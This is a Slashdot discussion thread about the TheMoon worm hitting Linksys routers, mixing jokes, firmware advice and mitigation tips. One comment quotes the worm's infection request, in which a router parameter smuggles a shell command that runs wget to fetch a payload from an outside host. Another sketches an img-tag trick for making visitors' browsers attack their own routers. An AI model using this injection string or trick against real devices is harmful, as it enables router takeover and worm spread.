Linksys Routers Exploited By "TheMoon"

UnderAttack writes "A vulnerability in many Linksys routers, allowing for unauthenticated code execution, is being used to mass-exploit various Linksys routers right now. Infected routers will start scanning for vulnerable systems themselves, leading to a very fast spread of this 'worm.'"

That's impossible

[CajunArson]

Linksys routers run Linux and Linux is Open Source. Therefore there are no bugs because theoretically someone can look at the code and fix the code.

This also means that it's impossible for bad people to look at the code and exploit the code because Open Source makes everyone honest by magic.

Oh, and by virtue of being able to look at the code, Linksys routers magically patch themselves before the bugs even come into existence!

In conclusion, Windows is the cause of all security problems.

Re:That's impossible

Times like this, I wish I had mod points. That was amazing.

Re:That's impossible

[Zantac69]

Search your feelings, you know it to be true.

Re: That's impossible

Slow your roll there, not all linksys run linux. Most run vxworks rtos. Only the linksys routers flashed with ddwrt firmware run linux for sure.

Re:That's impossible

[Narcocide]

Only affecting models not running Linux currently...

Re:That's impossible

Also, Linksys is owned by Cisco. Cisco makes IOS for their routers. iOS is on iPhones. iPhones have never had a worm like this.

Ipso facto, this is unpossible

Re:That's impossible

[gnick]

I tried to turn mine off, but it bit me! I tried throwing Androids at it, but zombies started flowing out of the Apple store to defend it!

Re:That's impossible

[X0563511]

Last I checked vxworks is not linux...

Re:That's impossible

[bobstreo]

Actually, linksys has been owned by Belkin for over a year:

http://www.bloomberg.com/news/...

Re:That's impossible

[operagost]

Join me, and we will h4x the galaxy as router and LAN.

Re:That's impossible

[operagost]

You are incorrect. It's my new open-source OS, VXINLX (aka VX is not linux) that is, of course, not Linux.

How to pronounce VXINLX is left as an exercise for the reader.

Re:That's impossible

[BronsCon]

What about WOPR?

Re:That's impossible

[FuegoFuerte]

As a result, there are now two brands of hardware that I will refuse to purchase. I swore off (and at) Belkin when I bought one of their APs and it wouldn't let me change the network for its management IP. It was hardcoded to 192.168.1.0/24, and their "customer service" response was "by design, FOAD."

I have a few of their surge suppressors, but generally anything with the Belkin name doesn't come into my house after that experience. Also, I'll never buy one of their PDUs for the datacenter - if their consumer support is that bad, why would I trust them in the enterprise?

Dear Businesses: Enterprise purchasing decisions are made by people who are also consumers who buy stuff for their homes.

Re:That's impossible

[BronsCon]

Last I checked, Skynet wasn't yet operational.

Re:That's impossible

[silviuc]

Those mentioned in the posting run vxworks not linux. Troll better next time.

Re: That's impossible

[Mashiki]

Odd, I run tomato. Which is also 'nix, so saying that ddwrt is the only way for sure isn't true.

Re: That's impossible

[tech.kyle]

I believe you're picking nits slightly. Regardless, you're totally right and the above AC is technically wrong. There are a good number of alternative router OSes available, many of which run *nix.

Re:That's impossible

[tech.kyle]

Just because some of their routers run *nix doesn't mean the software Linksys put on it is flawless. Doesn't matter what it's running if their grubby little hands were all over it.

Re:That's impossible

[tech.kyle]

Something something rotten Apple. *rimshot*

Re:That's impossible

[Technician]

Is this a case of default password, instead of a "Linux" vunerability?

Re:That's impossible

[JamieIanMacgregor]

apply hacksaw to antenna

Re:That's impossible

[FuegoFuerte]

Forget hacksaw, apply your favorite exploding target and a high power rifle. I guarantee it will be wireless, and no one will be accessing it anymore.

Re:That's impossible

[Elbart]

This drivel get's 3 points? /. is really dead.

poorly configured...

[crutchy]

...web server

56k Connections are still less safe

[BisuDagger]

I heard if you have a 56k connection that the NSA can listen to your internet.

Re:56k Connections are still less safe

[crutchy]

just don't verbally abuse your router because the FBI will bust down your door and drag you off to gitmo

Network company supplied routers vul'n

[RichMan]

Use this supplied router. Do NOT modify it.

But it has admin/admin as user name and password and is 192.168.1.1
Can I fix that.

Do NOT modify the settings on the supplied router.

*facepalm*

Re:Network company supplied routers vul'n

[SJHillman]

My ex-girlfriend's parents had a wireless router like that... both the wireless and web interface had default settings that they weren't supposed to change. And it gets better. Administration from the WAN side was enabled (supposedly for support). Yes, with the default UN/PW. Only Frontier could make TWC look somewhat competent.

Re:Network company supplied routers vul'n

[Mashdar]

Is "network company" an ISP?

Re: Network company supplied routers vul'n

[Selivanow]

Frontier has become better about not requiring a windows box. I'm pretty sure this directly related to having "smarter" routers as opposed to just a "dumb" modem.

Maybe they started hiring smarter helpdesk techs again. I swear it all went downhill after I stopped working there (did I just admit to that?).

I remember helping walk customers through their dialup connection issues while beating my hi-score on Galaga.

Model Numbers of affected devices.

Here is a list of router models mentioned in the binary:
E4200
E3200
E3000
E2500
E2100L
E2000
E1550
E1500
E1200
E1000
E900

Re:Model Numbers of affected devices.

[mmell]

I couldn't determine (maybe I read too fast, missed it) . . . is this an exploit against those models as shipped, or is this an exploit against Linksys routers which have been flashed to run a more current version of DD-WRT? I suspect the former, but I can't confirm that.

If it's the former, then a software fix (flash to latest DD-WRT) is already available for those technically competent to implement it. If the latter . . . oi vey.

Somebody had to do it

[SuperKendall]

Well I'm checking my router now and I don't see any is*#&$*#%(*#$# CARRIER MOONED

Re:Somebody had to do it

[WillAffleckUW]

Mine says "CHA1RF4CE CHIPENDALE"

Guess it's safe.

Re:Somebody had to do it

[ArsonSmith]

Hmm, Mine only says CHA

guess it got interrupted by the next tick prior to completion.

Re:Somebody had to do it

[Virtucon]

LOL I loved "The Tick"

Is dd-wrt affected?

[satuon]

I have a Linksys router with dd-wrt, would it be affected?

Re:Is dd-wrt affected?

[CreamyG31337]

no, it's just the default firmware.
"Only routers running stock firmware are vulnerable. OpenWRT is not vulnerable to this issue."
from the comments on https://isc.sans.edu/forums/di...

Default firmware only?

[allcoolnameswheretak]

Does this also apply to LinkSys Routers that have been Tomatoed?

Re:Default firmware only?

[SJHillman]

No, but it does affect routers that have smiley face stickers applied to the top or sides.

Re:Default firmware only?

[Lothsahn]

I'd love to hear a response from a tomato dev, but I'm almost sure it's not (and dd-wrt is probably not affected either). With my Tomato router, I get a 404 when I reference that URL.

The worm infects a router with the following URL: submit_button=&change_action=&submit_type=&action=&commit=0&ttcp_num=2&ttcp_size=2 &ttcp_ip=-h `cd /tmp;if [ ! -e .L26 ];then wget http://source/ IP]:193/0Rx.mid;fi` &StartEPI=1

It appears to be that the action is executing (at a shell) a portion of the ttcp_ip parameter. It appears it's a bug in the router's web application code itself, and not some sort of kernel-level vulnerability.

Actually Belkin bought them from Cisco

[fullmetal55]

Belkin purchased Linksys from Cisco last year. Linksys no longer has ties to Cisco, thus the unpossible is now possible.

and Belkin routers have a lovely feature that lets you schedule an automatic reboot so that you don't have to manually do it anymore... Rather than fixing the firmware problem that requires the frequent reboots.

Re:Actually Belkin bought them from Cisco

[operagost]

As I stuffed DD-WRT onto my Netgear router the other day in the hope I wouldn't have to keep rebooting it, I wondered when someone would come up with this sad feature. I didn't have to wait long for my answer.

I miss my Motorolas that would never need to be rebooted. Alas, 802.11g wasn't cutting it anymore.

Re:Actually Belkin bought them from Cisco

[DigiShaman]

"I can't get online. Is the internet down again?"

"Did you forget to reboot the router - again?!"

Have no fear. Belkin is here! With this new firmware reboots are scheduled automatically! ***applause***
Now the entire family is happy again.

Re:Actually Belkin bought them from Cisco

[amicusNYCL]

Belkin purchased Linksys from Cisco last year.

Man, I don't think I was aware of that. So now I have to add Linksys to my list of brands to never purchase? This is getting too confusing.

Re:Actually Belkin bought them from Cisco

[Mashdar]

I ran a Buffalo WHR-G125 with DD-WRT without restarting it for years. There were times when I was on vacation with it unplugged, so I'm not sure what the maximum continuous uptime was, but I never once had an issue which required a restart.
Conclusion? Read reviews before you buy a router and see if people talk about having to restart it. They don't all need it. It's absurd that Linksys routers have been so bad for so long...

Re: Actually Belkin bought them from Cisco

[DigiShaman]

Who knows. It could have been to address a class action lawsuit on a near EOLed product. Sour the milk and all that. The "solution" is to repla...er...upgrade the device.

That, or the original dev was forced to focus further development and support on newer products.

Re: Actually Belkin bought them from Cisco

[tragedy]

Think it's stupid in routers? Patriot missile systems used to have a timing bug that would reduce accuracy the longer the unit was in operation. The bug was that the time in seconds since initialization was being converted from an int to a float and divided by 10, causing precision to go down as the time value went up. The inaccuracy was pronounced after 8 hours of continuous operation and the workaround was to restart the unit frequently (actually, it was apparently to assume that the units would be restarted frequently). As a result a unit that had been operating for 100+ hours failed to track an incoming scud missile and there were 126 US Army casualties (28 fatalities). That's the kind of software bug you can get worked up about! It is worth noting that they did actually patch it, and the patch was actually available before that incident, but had not yet been applied to that particular unit.

Re: Actually Belkin bought them from Cisco

[JamieIanMacgregor]

isn't it the same fix for windows server?

Re:Actually Belkin bought them from Cisco

[GNious]

From experience, Belkin also has a nice feature whereby wifi stops working after a certain amount of data has been transferred over it, requiring you to have a scheduled reboot setup for at least once a week.

Your routers are now ours, by way of our actions.

[RevWaldo]

On the Moon, nerds get their pants pulled down and they are spanked with Moon rocks.

.

It wasn't Trolling

Trolling: "Gee, LinkSys uses Linux and it's an open source product. So much for the myth (or bullshit) that open source is more secure!" Or "See, open source is shit! Closed source would never have had this happen to it because this exploit could only have been found by seeingt he source!"

The GP, OTOH, mixed satire and sarcasm - a la "The Daily Show" and "Colbert Report" to poke fun at the false sense of security one may have with using open source and that regardless of the product we use, we all need to be vigilant with our security. Who knows what the intention of this worm is.

Also, I took the GP's comment as a little teasing at the expense of some of the rapid members of the open source community and the folks seem to jump on all the Windows failings and yet, brush aside similar failings in open source software.

I thought it was quite clever on a multitude of levels while expressing in very simple sentences.

Dodged that bullet

[Mike+Van+Pelt]

I'm sure glad I installed DDWRT on my E3000 about a year ago.

TheMoon

[confused+one]

Jade Rabbit suffered a failure and needed additional processing resources. It has reached out and now All Your Base Are Belong to Jade.

Why is the admin port open to the public?

[EMG+at+MU]

The web administration port should not be open to the public internet by default on these routers.

Re:Why is the admin port open to the public?

The web administration port should not be open to the public internet by default on these routers.

If you can access it from your browser on the LAN, it is open to the public. Your browser accepts lists of URLs to load from any page you visit. Those URLs can trigger the flaw.

XSS + CSRF breaks the Intranet/Internet barrier. It is safer to assume such a barrier does not exist. Your router should be secure from malicious traffic on any interface.

Re:Why is the admin port open to the public?

[TheRealMindChild]

What? My E4200 immediately refuses connection on the WAN side if administration is disabled on such. What am I missing?

Re:Why is the admin port open to the public?

Read the parent post more closely. Your browser visits a malicious site (or a legit site with a malicious link/image in a combox), which causes the browser to hit the router's LAN side.

Re:Why is the admin port open to the public?

[TheRealMindChild]

Thanks

how can i tell if my router is affected?

[schlachter]

I have a WRT54 running the original linksys software.
I know you guys will say to push DDWRT onto it.
In any case, how can i tell if my router's been compromised?
It has been flakey lately but I figured that was just signal interference.

Re:how can i tell if my router is affected?

There's a small recessed reset button on the back of the router. You have to get a paper clip and try to push it in there. If the router starts saying "I'm sorry Dave, I can't let you do that," and hits you with an electric shock, it has been compromised.

Re:how can i tell if my router is affected?

[sleekware]

I have a WRT54 running the original linksys software. I know you guys will say to push DDWRT onto it. In any case, how can i tell if my router's been compromised? It has been flakey lately but I figured that was just signal interference.

Also running original firmware, with a newer Linksys. Short of doing the most reasonable thing and swapping out my firmware for third party, I'm thinking of upgrading to the latest manufacturers firmware and then treating the router's IP as an untrusted site in my browser, adding an exception only when I need to make a change. Perhaps this would thwart? Also not using the default IP, didn't see it mentioned if that would matter...

Re:how can i tell if my router is affected?

[IDtheTarget]

There's a small recessed reset button on the back of the router. You have to get a paper clip and try to push it in there. If the router starts saying "I'm sorry Dave, I can't let you do that," and hits you with an electric shock, it has been compromised.

Damn, the first time I can remember when I *actually* laughed out loud at a Slashdot post, and I'm without MOD points!

Re:So what can be done?

[the_skywise]

Disabling Remote management will help but not fully solve the problem.

For instance a cross-scripting attack via your web browser could attempt to inject the worm on your side.

My problem is I've got two... no three.. relatives/families scattered all over the US who are running an E4200, an E3000 and a WRT54G who all happily run amok letting javascript run higgeldy-piggledy because to block it messes up their web browsing experience. :(

"Higgeldy-piggledy means a real mess!"

pronunciation

[dkman]

Vixin Licks? just sayin'

Better summary

[Logic+and+Reason]

https://isc.sans.edu/diary/Lin...

Re:One of these days, Alice!

[sideslash]

Sigh... at least quote it right. From Wikipedia:

"One of these days... POW!!! Right in the kisser!" or "BANG, ZOOM! Straight to the moon!", to which she usually replies, "Ahhh, shut up!"

You got the correct message

[CajunArson]

I'm glad you got the satire... I've been running Linux on any machine under my direct control since 2000 and I did my Master's thesis by hacking on a Linux Security Module for domain & type enforcement back when the 2.6 Kernel was still in beta... so I'm not exactly shilling for Microsoft.

I'm also not a fan of complacency. While I really like that a whole lot of devices run Linux, if they can't be updated to address security issues in a very easy (even completely automated) manner, then Linux can be just as vulnerable as Windows or anything else.

Re:You got the correct message

[SQLGuru]

Yay for common sense (both you and Anonymous above). I run Windows....I have nothing against Linux, but working in Windows pays the bills. I patch regularly, I browse intelligently....and I haven't had a virus on *MY* machine since the Ping-Pong virus back in the DOS days.........(that was a cool virus, BTW).

Open Source isn't a cure-all. Neither is Closed Source. User behavior and knowledge is the best cure-all.

Re:You got the correct message

[JamieIanMacgregor]

These DOS anecdotes I enjoy so I'll add one of my own...I used to run windows (never used AV) but not any more, not due to security but just prefer linux... the last virus I can remember getting was 'stoned' - that one was just weird - pre win3. oh yeah, did have some outlook vbs thing at work once and replaced hundreds of bios chips after chernobyl and chased some worm around a school but never had them myself.

Re:Your routers are now ours, by way of our action

[iluvcapra]

That's no moon...

TheMoon? We like the moon!

[93+Escort+Wagon]

Can't... help.... myself...

http://www.youtube.com/watch?v...

Agreed on Buffalo

[default+luser]

My HighPower N300 Gigabit DD-WRT has been completely stable to the point that I forget it's there. And if it wasn't, as the name implies I could fix any issues by upgrading to DD-WRT (this is a supported and warrantied mode).

This has been a fantastic experience, and it just makes we wonder why people persist in buying Linksys just for their name. Everyone has known for years that they are utter shit, but they keep buying the things!

mark calendar for firmware update, borrow junk unt

[raymorris]

Getting a Netgear WND3700 would solve the problem. That particular model is one I'm happy with , but there are plenty of perfectly fine routers around.

Linksys will probably put out an update that fixes the problem. You could mark your calendar for 30 days from now and Google search "update Linksys firmware to find illustrated instructions showing what buttons to press to do the update.

If you wish, you could use an old, cheap router while waiting for the update. Your friendly neighborhood geek probably has a few spares piled in a box somewhere.

img src=http://local/hack.cgi

[raymorris]

If you know any html, the subject line answers the question. If you don't, you might just have to trust that if I put something like the above in my web page, it causes visitors to hack their own router for me.

Not quite the case...

[Millennium]

Even if we limit our scope to routers-as-initially-purchased, there's still one stock model that runs Linux out of the box: the WRT54GL. It was made after Linksys otherwise switched to vxWorks, in an attempt to keep a hand in the Linux market.

I've got one. I flashed it with Tomato, but it definitely came with Linux on it.

But what about my Mac??

[bananahead]

But, but, but, do I need antivirus for my Mac?? (wait for it).... NO, Macs don't get viruses!!!! (this has little to do with the actual topic here, just trying to add to the hysteria)

NoScript ABE for the win

[Candyman_JAC]

NoScript in FireFox provides an Application Boundary Enforcer with a rule to block access to Local resources from the WAN. The rule looks like this:

# This one guards the local network, like LocalRodeo
# LOCAL is a placeholder which matches all the LAN
# subnets (possibly configurable) and localhost
Site LOCAL
Accept from LOCAL
Deny

I have not tested, but I think this will prevent a malicious website from exploiting this vulnerability

Re:Redirected to beta from RSS

[crutchy]

try clicking the X in the top right corner of the browser window

or change the URL from beta.slashdot.org to www.slashdot.org

if you're on a mobile, not sure... you may be stuffed there, but slashdot has always been pretty shit on a mobile

Re:Dont lie!

[BronsCon]

Why, oh why do I keep coming here?

That's right, shit like this.

Thanks :)